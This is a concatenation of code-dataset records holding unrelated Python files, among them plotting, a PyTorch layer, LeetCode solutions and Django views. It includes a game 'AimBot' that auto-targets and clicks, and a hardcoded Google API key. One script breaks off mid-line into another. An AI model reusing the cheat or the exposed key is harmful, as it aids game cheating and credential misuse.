xlabel=True, 
ylabel=True, X_twin=True, Y_twin=True, band='r'):\n    \n    myDic = {}\n    \n    pgc = Input1[0]\n    pc0 = Input1[2]\n    inc = Input1[3]\n    table = T1[5]\n    Epc0 = table['Epc0']\n    Einc = table['inc_e']\n    a,b,c,d, alpha, beta, gamma, Ealpha, Ebeta = getReddening_params(band1=band, band2='w1')\n    q2 = 10**(-1.*gamma)\n    F = log_a_b(inc, q2)\n    dF2 = Elogab2(inc, q2, Einc)\n    A1 = F*(a*pc0**3+b*pc0**2+c*pc0+d)\n    dA1 = np.sqrt(dF2*(a*pc0**3+b*pc0**2+c*pc0+d)**2+(F*(3*a*pc0**2+2*b*pc0+c)*Epc0)**2)\n    for i in range(len(pgc)):\n        myDic[pgc[i]]=[pc0[i],Epc0[i]]\n    \n\n    pgc = Input2[0]\n    pc0 = Input2[2]\n    inc = Input2[3]\n    table = T2[5]\n    Epc0 = table['Epc0']\n    Einc = table['inc_e']\n    a,b,c,d, alpha, beta, gamma, Ealpha, Ebeta = getReddening_params(band1=band, band2='w2')\n    q2 = 10**(-1.*gamma)\n    F = log_a_b(inc, q2)\n    dF2 = Elogab2(inc, q2, Einc)\n    A2 = F*(a*pc0**3+b*pc0**2+c*pc0+d)\n    dA2 = np.sqrt(dF2*(a*pc0**3+b*pc0**2+c*pc0+d)**2+(F*(3*a*pc0**2+2*b*pc0+c)*Epc0)**2)\n    PC_w1 = []\n    PC_w2 = []\n    EPC_w1 = []\n    EPC_w2 = []\n    for i in range(len(pgc)):\n        if pgc[i] in myDic:\n            PC_w2.append(pc0[i])\n            EPC_w2.append(Epc0[i])\n            PC_w1.append(myDic[pgc[i]][0])\n            EPC_w1.append(myDic[pgc[i]][1])\n    \n    \n    PC_w1 = np.asarray(PC_w1)\n    PC_w2 = np.asarray(PC_w2)\n    EPC_w1 = np.asarray(EPC_w1)\n    EPC_w2 = np.asarray(EPC_w2)\n    if scatter:\n        ax.plot(PC_w1, PC_w2, 'o', color='black', markersize=2, alpha=0.2)\n    \n    ### Fitting a curve\n    #AB, cov = np.polyfit(PC_w1,PC_w2, 1, cov=True, full = False)\n    #m, b = AB[0], AB[1]\n    x_ = np.linspace(-4,4,50)\n    #y_ = m*x_+b\n    #ax.plot(x_, y_, 'r--') \n    \n    M,B,samples=linMC(PC_w1, PC_w2, EPC_w1, EPC_w2)\n    m = M[0] ; me=0.5*(M[1]+M[2])\n    b = B[0] ; be=0.5*(B[1]+B[2])\n    y_, yu, yl = linSimul(samples, x_, size=500)\n    ax.fill_between(x_, y_+2*yu, y_-2*yl, color='r', alpha=0.5, edgecolor=\"none\")\n    ax.plot(x_, m*x_+b, 'r--') \n    \n    \n    delta = np.abs(PC_w2-(m*PC_w1+b))\n    rms = np.sqrt(np.median(np.square(delta)))\n    ax.text(0,-2, \"m= \"+\"%.3f\" % m+'$\\\pm$'+\"%.3f\" % me, fontsize=14)\n    ax.text(0,-2.5, \"b= \"+\"%.3f\" % b+'$\\\pm$'+\"%.3f\" % be, fontsize=14)\n    ax.text(0,-3, r'$RMS=$'+'%.3f'%rms, fontsize=14, color='k') \n    plt.errorbar([-2.5], [2.5], xerr=[np.median(EPC_w1)], yerr=[np.median(EPC_w2)], color='k', fmt='o', alpha=0.7, capsize=3, markersize=5)\n    \n    if binned:\n        xl = []\n        yl= []\n        yel=[]\n        \n        low = -4; high=3.5\n        for i in np.arange(low,high,0.5):\n            \n            x = []\n            y = []\n            for ii in range(len(PC_w2)):\n                xi = PC_w1[ii]\n                if xi>i and xi<=i+0.5:\n                    x.append(xi)\n                    y.append(PC_w2[ii])\n            if len(x)>0:\n                \n                x = np.asarray(x)\n                y = np.asarray(y)\n                \n                average = np.median(y)\n                stdev = np.std(y)\n                \n                index = np.where(y<average+3.*stdev)\n                x = x[index]\n                y = y[index]\n                index = np.where(y>average-3.*stdev)\n                x = x[index]\n                y = y[index] \n\n                ax.errorbar(np.median(x), np.median(y), yerr=np.std(y), fmt='o', color=color, markersize=5)\n                \n                xl.append(np.median(x))\n                yl.append(np.median(y))\n                yel.append(np.std(y))\n    \n    \n    ax.tick_params(which='major', length=6, width=1.5, direction='in')\n    ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in')\n    ax.minorticks_on()\n    \n\n    ax.set_ylim([-3.6,3.6]) \n    ax.set_xlim([-3.6,3.6]) \n    \n    if xlabel: ax.set_xlabel(r'$P_{1,w1}$', fontsize=16)\n    if ylabel: ax.set_ylabel(r'$P_{1,w2}$', fontsize=16) \n    \n    if Y_twin:\n        y_ax = ax.twinx()\n        y_ax.set_ylim(-3.6,3.6)\n        y_ax.set_yticklabels([])\n        y_ax.minorticks_on()\n        y_ax.tick_params(which='major', length=6, width=1.5, direction='in')\n        y_ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in') \n    \n    if X_twin:\n        x_ax = ax.twiny()\n        x_ax.set_xlim(-3.6,3.6)\n        
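# blank the top tick labels; this axis only mirrors the bottom one\n        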
x_ax.set_xticklabels([])\n x_ax.minorticks_on()\n x_ax.tick_params(which='major', length=6, width=1.0, direction='in')\n x_ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in') \n\n \n\n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(14) \n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(14) \n\n###########################################################\n\n\n\nplot_array('ESN_HI_catal.csv', scatter=True, binned=False) \n\n\n","sub_path":"Make_reddening_plot5_PC0.py","file_name":"Make_reddening_plot5_PC0.py","file_ext":"py","file_size_in_byte":9748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"652853739","text":"import math\nimport torch\nfrom torch.autograd import Variable\nfrom torch.nn.parameter import Parameter\nfrom torch.nn.modules import Module\n\nclass GroupBridgeoutFcLayer(Module):\n r\"\"\"Applies the brigdeout transformation to the incoming data: :math:`y = Bx + b`\n\n Args:\n in_features: size of each input sample\n out_features: size of each output sample\n p: dropout probablity\n q: norm of the penalty\n bias: If set to False, the layer will not learn an additive bias.\n Default: True\n\n Shape:\n - Input: :math:`(N, in\\_features)`\n - Output: :math:`(N, out\\_features)`\n\n Attributes:\n weight: the learnable weights of the module of shape\n (out_features x in_features)\n bias: the learnable bias of the module of shape (out_features)\n\n Examples::\n\n >>> m = Bridgeout(20, 30)\n >>> input = autograd.Variable(torch.randn(128, 20))\n >>> output = m(input)\n >>> print(output.size())\n \"\"\"\n\n def __init__(\n self,\n in_features,\n out_features,\n p=0.5,\n q1=2.0,\n q2=2.0,\n target_fraction=1.0,\n bias=True,\n batch_mask=False,\n unit_test_mode=False):\n super(GroupBridgeoutFcLayer, self).__init__()\n self.p=p\n self.q=q1 / 2.0\n self.q2 = q2\n self.target_fraction = target_fraction\n self.in_features = in_features\n self.out_features = out_features\n \n assert not unit_test_mode, 'not implemented'\n assert target_fraction==1.0, 'not implemented'\n \n self.unit_test_mode = unit_test_mode\n \n self.rand_gen = torch.Generator()\n if unit_test_mode: \n self.rand_gen.manual_seed(0)\n \n self.weight = Parameter(torch.Tensor(in_features, out_features))\n self.use_same_mask = batch_mask\n if bias:\n self.bias = Parameter(torch.Tensor(out_features))\n else:\n self.register_parameter('bias', None)\n self.reset_parameters()\n \n\n def reset_parameters(self):\n if self.unit_test_mode:\n self.rand_gen.manual_seed(0)\n stdv = 1. / math.sqrt(self.weight.size(0))\n self.weight.data.uniform_(-stdv, stdv, generator=self.rand_gen)\n if self.bias is not None:\n self.bias.data.uniform_(-stdv, stdv, generator=self.rand_gen)\n\n def forward(self, input_x):\n if self.training:\n if self.unit_test_mode:\n self.rand_gen.manual_seed(0) \n \n bS, inpS = input_x.size()\n outS = self.weight.size()[1]\n \n input_x = input_x.view(bS,1,inpS)\n # not sure why this 1e-15 is needed? 
but lstm models are giving nans for q < 2 without it\n \n if not self.use_same_mask:\n w = self.weight.expand(bS, inpS, outS)\n wq = torch.norm(w, self.q2, dim=2).add(1e-15).pow( self.q ).unsqueeze(2)\n else:\n w = self.weight\n wq = torch.norm(w, self.q2, dim=1).add(1e-15).pow( self.q ).unsqueeze(1)\n \n noise = w.data.clone()\n noise.bernoulli_(1 - self.p, generator=self.rand_gen).div_(1 - self.p).sub_(1)\n targeting_mask = 1.0\n# if self.target_fraction < 1.0:\n# w_shape = w.size()\n# w_flattened_abs = torch.abs(w.view([w_shape[0], -1]))\n# sorted_indices = torch.argsort(w_flattened_abs, dim=1)\n# n = int(sorted_indices.size()[1]*self.target_fraction)\n# threshold_values = w_flattened_abs.gather(1,sorted_indices)[:,n].view([-1,1])\n# targeting_mask = w_flattened_abs.le(threshold_values).view(w_shape).type(w.dtype)\n# \n \n perturbation_equivalent = wq.mul(Variable(noise)).mul(targeting_mask)\n \n \n w = w.add( perturbation_equivalent )\n if self.bias is not None:\n output = input_x.matmul(w).view(bS,outS).add(self.bias)\n else:\n output = input_x.matmul(w).view(bS,outS)\n else:\n if self.bias is not None:\n output = input_x.matmul(self.weight).add(self.bias)\n else:\n output = input_x.matmul(self.weight)\n \n return output\n\n def __repr__(self):\n return self.__class__.__name__ + ' (' \\\n + str(self.in_features) + ' -> ' \\\n + str(self.out_features) + ')'\n\n\nif __name__ == '__main__':\n# functional_testing()\n b = GroupBridgeoutFcLayer(2,4, q1=2, q2=2, batch_mask=True).double()\n x = Variable(torch.ones(5, 2).double(), requires_grad=True)\n y = b(x)\n y.backward(torch.ones(y.size()).double())\n print(y)\n [print('p, p.grad', n, p.grad) for n, p in b.named_parameters()]\n# print(y)\n# # b.zero_grad()\n# # y = b(x)\n# # y.backward(torch.ones(y.size()).double())\n# # [print('p, p.grad', n, p.grad) for n, p in b.named_parameters()]\n# # print(y)\n \n","sub_path":"src/group_bridgeout_fc.py","file_name":"group_bridgeout_fc.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466731375","text":"import warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport os, sys\n\nimport pyautogui\nimport cv2\nimport argparse\nimport re\n\nfrom time import time, sleep\nfrom threading import Thread, Lock\n\nfrom gamecapture import GameCapture\nfrom detection import Detection\nfrom vision import Vision\nfrom utilities import Utilities\n\npyautogui.PAUSE = 0\n\n\nclass AimBot:\n\n running = False\n lock = None\n state = None\n\n active_targets = None\n frame = None\n action_history = None\n start_time = 0\n\n\n def __init__(self):\n self.lock = Lock()\n self.active_targets = []\n self.action_history = []\n self.start_time = time()\n\n \n def shoot(self, target):\n # TODO: PyDirectInput for DirectX on windows\n try:\n pyautogui.moveTo(target[0], target[1])\n pyautogui.click()\n self.action_history.append((time() - self.start_time, target))\n\n except pyautogui.FailSafeException as e:\n pyautogui.moveTo(0, 0)\n #pyautogui.click()\n self.action_history.append((time() - self.start_time, (0, 0)))\n \n\n def start(self):\n self.running = True\n t = Thread(target=self.run)\n t.start()\n\n\n def stop(self):\n self.running = False\n \n \n def update(self, frame):\n self.lock.acquire()\n self.frame = frame\n self.lock.release()\n\n\n def run(self):\n while self.running:\n # TODO: shoot active target\n pass\n\n\ndef main():\n\n sw = pyautogui.size()[0]\n sh = pyautogui.size()[1]\n \n #multi_thread(sw, sh)\n\n 
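# run capture, detection, and aiming sequentially on the main thread\n    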
single_thread(sw, sh)\n\n\ndef single_thread(sw, sh):\n\n    capture = GameCapture(sw, sh)\n    detector = Detection()\n    vision = Vision()\n    aimbot = AimBot()\n\n    record = type(args['record']) == str\n    if record:\n        num = len([f for f in os.listdir(\"output\") if re.match(f'^{args[\"record\"]}', f)])\n        fps = Utilities.fps_test2(sw, sh)\n        print(f'FPS: {fps}')\n        out = cv2.VideoWriter(f'output/{args[\"record\"]}-{num}.mp4', cv2.VideoWriter_fourcc(*'mp4v'), fps, (sw*2, sh*2))\n    \n    try:\n        while True:\n            frame = capture.capture_frame_by_PIL()\n\n            boxes = detector.detect_YOLOv3(frame)\n\n            target = vision.get_priority_target(boxes)\n            frame = vision.draw_bounding_boxes(frame, boxes)\n            frame = vision.draw_crosshair(frame, target)\n\n            if target is not None:\n                aimbot.shoot(target)\n\n            if record:\n                out.write(frame)\n\n    except Exception as e:\n        #print(e)\n        pass\n\n    if record:\n        out.release()\n\n    with open('output/actions.txt', 'w') as f:\n        for action in aimbot.action_history:\n            f.write(str(action))\n\n\ndef multi_thread(sw, sh):\n\n    capture = GameCapture(sw, sh)\n    detector = Detection()\n    vision = Vision()\n    aimbot = AimBot()\n\n    record = type(args['record']) == str\n    if record:\n        num = len([f for f in os.listdir(\"output\") if re.match(f'^{args[\"record\"]}', f)])\n        fps = Utilities.fps_test(sw, sh)\n        out = cv2.VideoWriter(f'output/{args[\"record\"]}-{num}.mp4', cv2.VideoWriter_fourcc(*'mp4v'), fps, (sw*2, sh*2))\n    \n    capture.start()\n    detector.start()\n    aimbot.start()\n\n    try:\n        while True:\n            \n            if capture.frame is None:\n                continue\n            \n            detector.update(capture.frame)\n\n            # TODO: align bounding boxes with the correct frame OR reduce detect time by x10\n            target = vision.get_priority_target(detector.boxes)\n            frame = vision.draw_bounding_boxes(detector.frame, detector.boxes)\n            frame = vision.draw_crosshair(frame, target)\n\n            if target is not None:\n                aimbot.shoot(target)\n\n            if record:\n                out.write(frame)\n\n    except Exception as e:\n        print(e)\n        pass\n    \n    capture.stop()\n    detector.stop()\n    aimbot.stop()\n\n    if record:\n        out.release()\n\n    with open('output/actions.txt', 'w') as f:\n        for action in aimbot.action_history:\n            f.write(str(action))\n        pass\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--record', metavar='', type=str, default=False, help='Record the live capture to an mp4 file.')\nargs = vars(parser.parse_args())\n\n\nif __name__ == '__main__':\n    main()","sub_path":"aimbot.py","file_name":"aimbot.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444763641","text":"import argparse\nimport parsl\nfrom parsl import *\n\nworkers = ThreadPoolExecutor(max_workers=4)\ndfk = DataFlowKernel(executors=[workers])\n\n\n## Define Apps ##\n@App('bash', dfk)\ndef WireDelay(threshIn='', outputs=[], geoDir='', daqId='', fw=''):\n\t\treturn 'perl perl/WireDelay.pl %s %s %s %s %s' %(threshIn,outputs[0],geoDir,daqId,fw)\n\n#@App('bash', dfk)\n#def WireDelay(inputs=[], outputs=[], geoDir='', daqId='', fw=''):\n#\t\treturn 'perl perl/WireDelay.pl %s %s %s %s %s' %(inputs[0],outputs[0],geoDir,daqId,fw)\n\n@App('bash', dfk)\ndef Combine(inputs=[],outputs=[]):\n\t\tfilenames = [str(i) for i in inputs]\n\t\tprint(\"inside Combine checkpoint 1\")\n\t\tprint(' '.join(filenames) )\n\t\t#print('perl perl/Combine.pl ' + ' '.join(inputs) + ' ' + str(outputs[0]))\n\t\tprint(\"inside Combine checkpoint 2\")\n\t\treturn 'perl perl/Combine.pl ' + ' '.join(filenames) + ' ' + str(outputs[0])\n\n@App('bash', dfk)\ndef Sort(inputs=[], outputs=[], 
key1='1', key2='1'):\n\t\treturn 'perl perl/Sort.pl %s %s %s %s' %(inputs[0], outputs[0], key1, key2)\n\n@App('bash', dfk)\ndef EventSearch(inputs=[], outputs=[], gate='', detCoinc='2', chanCoinc='2', eventCoinc='2'):\n\t\treturn 'perl perl/EventSearch.pl %s %s %s %s %s %s' %(inputs[0],outputs[0],gate,detCoinc,chanCoinc,eventCoinc)\n\n\n## Parse the command-line arguments ##\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"--thresholdAll\", nargs='+', help=\"All threshold files\")\nparser.add_argument(\"--wireDelayData\", nargs='+', help=\"Filenames for intermediate Wire Delay data\")\nparser.add_argument(\"--geoDir\", help=\"Directory containing DAQ ID directories that contain .geo files\")\n#parser.add_argument(\"--geoFiles\", nargs='+', help=\".geo filenames for each CRD\")\nparser.add_argument(\"--detectors\", nargs='+', help=\"IDs of all CRDs in the analysis\")\nparser.add_argument(\"--firmwares\", nargs='+', help=\"DAQ firmware versions\")\nparser.add_argument(\"--combineOut\", help=\"Combined data from all intermediate Wire Delay files\")\nparser.add_argument(\"--sort_sortKey1\")\nparser.add_argument(\"--sort_sortKey2\")\nparser.add_argument(\"--sortOut\")\nparser.add_argument(\"--gate\")\nparser.add_argument(\"--detectorCoincidence\")\nparser.add_argument(\"--channelCoincidence\")\nparser.add_argument(\"--eventCoincidence\")\nparser.add_argument(\"--eventCandidates\", help=\"eventCandidates file\")\n\nargs = parser.parse_args()\n\n\n## The Workflow ##\n\n# 1) WireDelay() takes input Threshold (.thresh) files and converts\n# each to a Wire Delay (.wd) file:\nWireDelay_futures = []\nfor i in range(len(args.thresholdAll)):\n\t\tWireDelay_futures.append(WireDelay(threshIn=args.thresholdAll[i], outputs=[args.wireDelayData[i]], geoDir=args.geoDir, daqId=args.detectors[i],fw=args.firmwares[i]))\n\n# WireDelay_futures is a list of futures.\n# Each future has an outputs list with one output.\nWireDelay_outputs = [i.outputs[0] for i in WireDelay_futures]\n\nprint(\"pre-combine checkpoint\")\n\n# 2) Combine() takes the WireDelay files output by WireDelay() and combines\n# them into a single file with name given by --combineOut\n#print(WireDelay_outputs, [args.combineOut])\nCombine_future = Combine(inputs=WireDelay_outputs, outputs=[args.combineOut])\n\n# 3) Sort() sorts the --combineOut file, producing a new file with name given\n# by --sortOut\nSortFuture = Sort(inputs=Combine_future.outputs, outputs=[args.sortOut], key1=args.sort_sortKey1, key2=args.sort_sortKey2)\n\n\n# 4) EventSearch() processes the --sortOut file and identifies event\n# candidates in a output file with name given by --eventCandidates\n# NB: This output file is interpreted by the e-Lab webapp, which expects it\n# to be named \"eventCandidates\"\nEventSearch(inputs=SortFuture.outputs, outputs=[args.eventCandidates], gate=args.gate, detCoinc=args.detectorCoincidence, chanCoinc=args.channelCoincidence, eventCoinc=args.eventCoincidence)\n","sub_path":"ShowerStudy-Test.py","file_name":"ShowerStudy-Test.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"358421816","text":"from flask import *\nimport pandas as pd\nfrom data import get_projections\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n \n projections, grades = get_projections()\n return render_template('index.html', projections=projections, grades=grades)\n\nif __name__ == \"__main__\":\n 
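# debug=True enables the reloader and interactive debugger; disable it in production\n    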
app.run(debug=True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534177851","text":"# 1537. Get the Maximum Score\n# vwc 200\n# 2021/11/12\n\n# Runtime: 608 ms, faster than 69.07% of Python3 online submissions for Get the Maximum Score.\n# Memory Usage: 31.5 MB, less than 24.74% of Python3 online submissions for Get the Maximum Score.\n\n\n# A greedy, observation-based problem.\n# Split both arrays into segments at their common values (shared nodes).\n# While traversing, simply follow whichever path has the larger segment sum.\n# This solution is not written elegantly; the discussion section has more refined ones.\n\nfrom typing import List\n\n\nclass Solution:\n    def maxSum(self, nums1: List[int], nums2: List[int]) -> int:\n        common = set(nums1) & set(nums2)\n\n        pos1, pos2 = {0: 0}, {0: 0}\n        for i, num in enumerate(nums1):\n            if num in common:\n                pos1[num] = i\n        for i, num in enumerate(nums2):\n            if num in common:\n                pos2[num] = i\n\n        sums1, sums2 = [0], [0]\n        for num in nums1:\n            sums1.append(sums1[-1] + num)\n        for num in nums2:\n            sums2.append(sums2[-1] + num)\n        common = sorted(common)\n        ans, val_l = 0, 0\n        for i in range(len(common)):\n            l1, l2 = pos1[val_l], pos2[val_l]\n            val_r = common[i]\n            r1, r2 = pos1[val_r], pos2[val_r]\n            ans += max(sums1[r1] - sums1[l1], sums2[r2] - sums2[l2]) % 1_000_000_007\n            val_l = common[i]\n        l1, l2 = pos1[val_l], pos2[val_l]\n        ans += max(sums1[-1] - sums1[l1], sums2[-1] - sums2[l2]) % 1_000_000_007\n        return ans % 1_000_000_007\n\n\n","sub_path":"1537. Get the Maximum Score.py","file_name":"1537. Get the Maximum Score.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"62643208","text":"class CustomStack:\n    \"\"\"\n    O(n) increment\n    \"\"\"\n\n    def __init__(self, maxSize: int):\n        self.stack = []\n        self.max_size = maxSize\n\n    def push(self, x: int) -> None:\n        if len(self.stack) < self.max_size:\n            self.stack.append(x)\n\n    def pop(self) -> int:\n        if self.stack:\n            return self.stack.pop()\n        return -1\n\n    def increment(self, k: int, val: int) -> None:\n        for i in range(min(k, len(self.stack))):\n            self.stack[i] += val\n\n\nclass CustomStack:\n    \"\"\"\n    O(1) increment\n    \"\"\"\n\n    def __init__(self, maxSize: int):\n        self.stack = []\n        self.max_size = maxSize\n        self.inc = []\n\n    def push(self, x: int) -> None:\n        if len(self.stack) < self.max_size:\n            self.stack.append(x)\n            self.inc.append(0)\n\n    def pop(self) -> int:\n        if self.stack:\n            if len(self.stack) > 1:\n                self.inc[-2] += self.inc[-1]\n            return self.stack.pop() + self.inc.pop()\n        return -1\n\n    def increment(self, k: int, val: int) -> None:\n        if self.stack:\n            self.inc[min(k, len(self.stack)) - 1] += val\n\n\nif __name__ == \"__main__\":\n    customStack = CustomStack(3)\n    customStack.push(1)\n    customStack.push(2)\n    print(customStack.pop())\n    customStack.push(2)\n    customStack.push(3)\n    customStack.push(4)\n    customStack.increment(5, 100)\n    customStack.increment(2, 100)\n    print(customStack.pop())\n    print(customStack.pop())\n    print(customStack.pop())\n    print(customStack.pop())\n","sub_path":"array_stack_queue/1381DesignaStackWithIncrementOperation.py","file_name":"1381DesignaStackWithIncrementOperation.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326574366","text":"print('welcome to program that displays the pythagorean triplets within a given range')#welcome message\nlimit=int(input('enter the highest range till which you would like to see the triplets\\n='))\nm=2\nwhile m**2
#except Exception:\n #pass\n if not message_add:\n start_date = datetime.datetime.strptime(start_date, '%Y/%m/%d').strftime('%Y-%m-%d')\n if release_date != \"\":\n release_date = datetime.datetime.strptime(release_date, '%Y/%m/%d').strftime('%Y-%m-%d')\n models.Project.objects.create(PROJECT_ID=get_next_value('festival_classification_seq'),\n START_DATE=start_date, PROJECT_NO=project_no,\n PROJECT_NAME=project_name, PROTYPE_CODE_id=protype_code,\n LANGUAGE_CODE_id=language_code, SUMMARY=summary,\n STATUS_CODE_id=status_code, CUSTOMER=customer, CHARGE=charge,\n REVIEWER=reviewer, RELEASE_DATE=release_date, REMARKS=remarks)\n return redirect('/add/')\n else:\n models.Project.objects.create(PROJECT_ID=get_next_value('festival_classification_seq'),\n START_DATE=start_date, PROJECT_NO=project_no,\n PROJECT_NAME=project_name, PROTYPE_CODE_id=protype_code,\n LANGUAGE_CODE_id=language_code, SUMMARY=summary,\n STATUS_CODE_id=status_code, CUSTOMER=customer, CHARGE=charge,\n REVIEWER=reviewer, REMARKS=remarks)\n return redirect('/add/')\n return render(request, 'add.html', locals())\n add_form = ProjectForm()\n return render(request, 'add.html', locals())\n\n\ndef list_req(request):\n projects = models.Project.objects.all().order_by('PROJECT_ID')\n message_list = \"\"\n if projects.count() == 0:\n message_list = \"レコードが登録されていません。\"\n return render(request, 'list.html', {'message_list': message_list})\n for p in projects:\n p.PROTYPE_CODE_id = models.ProjectType.objects.get(PROTYPE_CODE=p.PROTYPE_CODE_id).PROTYPE_NAME\n p.LANGUAGE_CODE_id = models.Language.objects.get(LANGUAGE_CODE=p.LANGUAGE_CODE_id).LANGUAGE_NAME\n p.STATUS_CODE_id = models.Status.objects.get(STATUS_CODE=p.STATUS_CODE_id).STATUS_NAME\n p.PROJECT_ID = '{:0=4}'.format(p.PROJECT_ID)\n if p.RELEASE_DATE is None:\n p.RELEASE_DATE = \"\"\n url_form = UrlForm(initial={'now_url': request.path})\n url_form.fields['now_url'].widget = forms.HiddenInput()\n d = {\n 'projects': projects,\n 'message_list': message_list,\n 'url_form': url_form,\n }\n return render(request, 'list.html', d)\n\n\ndef isalnum(s):\n return re.compile(r'^[a-zA-Z0-9]+$').match(s) is not None\n\n\ndef isdateformat(date_text):\n return re.compile(r'^\\d{4}/\\d{2}/\\d{2}$').match(date_text) is not None\n\n\ndef isdate(date_text):\n try:\n datetime.datetime.strptime(date_text, '%Y/%m/%d')\n except ValueError:\n return False\n return True\n\n\ndef edit(request, project_id):\n if request.method == 'GET':\n url_form = UrlForm(request.GET)\n if url_form.is_valid():\n if url_form.cleaned_data['now_url'] == \"\":\n return render(request, 'error.html')\n else:\n return render(request, 'error.html')\n project = models.Project.objects.get(PROJECT_ID=project_id)\n message_add = \"\"\n if request.method == 'POST':\n form = ProjectForm(request.POST)\n form.fields['start_date'].required = False\n form.fields['project_no'].required = False\n form.fields['project_name'].required = False\n form.fields['protype_code'].required = False\n if form.is_valid():\n language_code = form.cleaned_data['language_code'].LANGUAGE_CODE\n summary = form.cleaned_data['summary']\n status_code = form.cleaned_data['status_code'].STATUS_CODE\n customer = form.cleaned_data['customer']\n charge = form.cleaned_data['charge']\n reviewer = form.cleaned_data['reviewer']\n release_date = form.cleaned_data['release_date']\n remarks = form.cleaned_data['remarks']\n if language_code == \"\":\n message_add = message_add + \"開発言語が選択されていません。\\n\"\n if status_code == \"\":\n message_add = message_add + 
\"状態が選択されていません。\\n\"\n if release_date != \"\":\n if not isdateformat(release_date):\n message_add = message_add + \"リリース日は yyyy/MM/dd の形式で入力してください。\\n\"\n elif not isdate(release_date):\n message_add = message_add + \"リリース日はカレンダーに存在しない日付です。\\n\"\n if message_add == \"\":\n project.LANGUAGE_CODE_id = language_code\n project.SUMMARY = summary\n project.STATUS_CODE_id = status_code\n project.CUSTOMER = customer\n project.CHARGE = charge\n project.REVIEWER = reviewer\n if release_date != \"\":\n release_date = datetime.datetime.strptime(release_date, '%Y/%m/%d').strftime('%Y-%m-%d')\n project.RELEASE_DATE = release_date\n project.REMARKS = remarks\n project.save()\n return redirect('/list/')\n else:\n form = ProjectForm(initial={\n 'project_id': project.PROJECT_ID,\n 'start_date': project.START_DATE.strftime('%Y/%m/%d'),\n 'project_no': project.PROJECT_NO,\n 'project_name': project.PROJECT_NAME,\n 'protype_code': project.PROTYPE_CODE_id,\n 'language_code': language_code,\n 'summary': summary,\n 'status_code': status_code,\n 'customer': customer,\n 'charge': charge,\n 'reviewer': reviewer,\n 'release_date': release_date,\n 'remarks': remarks,\n })\n form.fields['start_date'].disabled = True\n form.fields['project_no'].disabled = True\n form.fields['project_name'].disabled = True\n form.fields['protype_code'].disabled = True\n d = {\n 'project': form,\n 'project_id': project.PROJECT_ID,\n 'message_add': message_add,\n }\n return render(request, 'change.html', d)\n if project.RELEASE_DATE is None:\n rel_date = \"\"\n else:\n rel_date = project.RELEASE_DATE.strftime('%Y/%m/%d')\n form = ProjectForm(initial={\n 'project_id': project.PROJECT_ID,\n 'start_date': project.START_DATE.strftime('%Y/%m/%d'),\n 'project_no': project.PROJECT_NO,\n 'project_name': project.PROJECT_NAME,\n 'protype_code': project.PROTYPE_CODE_id,\n 'language_code': project.LANGUAGE_CODE_id,\n 'summary': project.SUMMARY,\n 'status_code': project.STATUS_CODE_id,\n 'customer': project.CUSTOMER,\n 'charge': project.CHARGE,\n 'reviewer': project.REVIEWER,\n 'release_date': rel_date,\n 'remarks': project.REMARKS,\n })\n form.fields['start_date'].disabled = True\n form.fields['project_no'].disabled = True\n form.fields['project_name'].disabled = True\n form.fields['protype_code'].disabled = True\n d = {\n 'project': form,\n 'project_id': project.PROJECT_ID,\n 'message_add': message_add,\n }\n return render(request, 'change.html', d)\n\n\ndef delete(request, project_id):\n project = models.Project.objects.get(PROJECT_ID=project_id)\n project.delete()\n return redirect('/list/')\n\n\ndef emotion(request):\n if request.method == 'POST':\n key = \"AIzaSyBbKSOqrwtXdRLV-owLDaP4shCoV8o_V7U\"\n url = 'https://language.googleapis.com/v1/documents:analyzeSentiment?key=' + key\n emotion_form = EmotionForm(request.POST)\n result = \"\"\n detail = {}\n if emotion_form.is_valid():\n text = emotion_form.cleaned_data['input_text']\n header = {'Content-Type': 'application/json'}\n body = {\n \"document\": {\n \"type\": \"PLAIN_TEXT\",\n \"language\": \"JA\",\n \"content\": text\n },\n \"encodingType\": \"UTF8\"\n }\n response = requests.post(url, headers=header, json=body).json()\n result = result + \"総合振れ幅:\" + str(response[\"documentSentiment\"][\"magnitude\"]) + \"\\n\"\n result = result + \"総合score(顧客満足度):\" + str(response[\"documentSentiment\"][\"score\"]) + \"\\n\"\n for i in response[\"sentences\"]:\n detail[i[\"text\"][\"content\"]] = [str(i[\"sentiment\"][\"score\"]), i[\"sentiment\"][\"magnitude\"]]\n retresult = {\n 'result': result,\n 
